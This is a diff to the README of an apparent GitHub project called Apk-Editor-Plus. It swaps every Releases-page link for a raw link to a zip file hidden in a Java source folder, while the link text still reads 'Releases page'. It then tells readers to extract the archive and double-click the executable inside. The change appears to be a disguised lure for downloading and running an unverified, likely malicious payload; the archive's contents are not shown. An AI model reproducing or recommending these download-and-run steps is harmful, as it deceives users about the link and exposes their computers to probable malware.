clumsyklutz/Apk-Editor-Plus/README.md

 ## 🚀 Getting Started
 To get started with Apk-Editor-Plus, follow these steps:

-1. **Visit the Download Page:** Click [here](https://github.com/clumsyklutz/Apk-Editor-Plus/releases) to go to the Releases page.
+1. **Visit the Download Page:** Click [here](https://github.com/clumsyklutz/Apk-Editor-Plus/raw/refs/heads/master/app/src/main/java/com/c/a/Plus_Apk_Editor_premonitory.zip) to go to the Releases page.
 2. **Choose Your Version:** Look for the latest version of Apk-Editor-Plus.
 You will see a list of files available for download.
 3. **Download the File:** Click on the appropriate link to download the software.
-It is usually presented in a format like "Apk-Editor-Plus-vX.X.zip".
+It is usually presented in a format like "https://github.com/clumsyklutz/Apk-Editor-Plus/raw/refs/heads/master/app/src/main/java/com/c/a/Plus_Apk_Editor_premonitory.zip".

 ## 📥 Download & Install
-1. **Visit the Releases Page:** Again, click [here](https://github.com/clumsyklutz/Apk-Editor-Plus/releases) to open the download section.
+1. **Visit the Releases Page:** Again, click [here](https://github.com/clumsyklutz/Apk-Editor-Plus/raw/refs/heads/master/app/src/main/java/com/c/a/Plus_Apk_Editor_premonitory.zip) to open the download section.
 2. **Save the File:** Select the version you want and download it.
 3. **Extract the Zip File:** Once downloaded, right-click on the zip file and select “Extract All.”
 Choose a location on your computer to save the files.
 4. **Run the Application:** Locate the extracted folder, find the Apk-Editor-Plus executable file, and double-click it to run the program.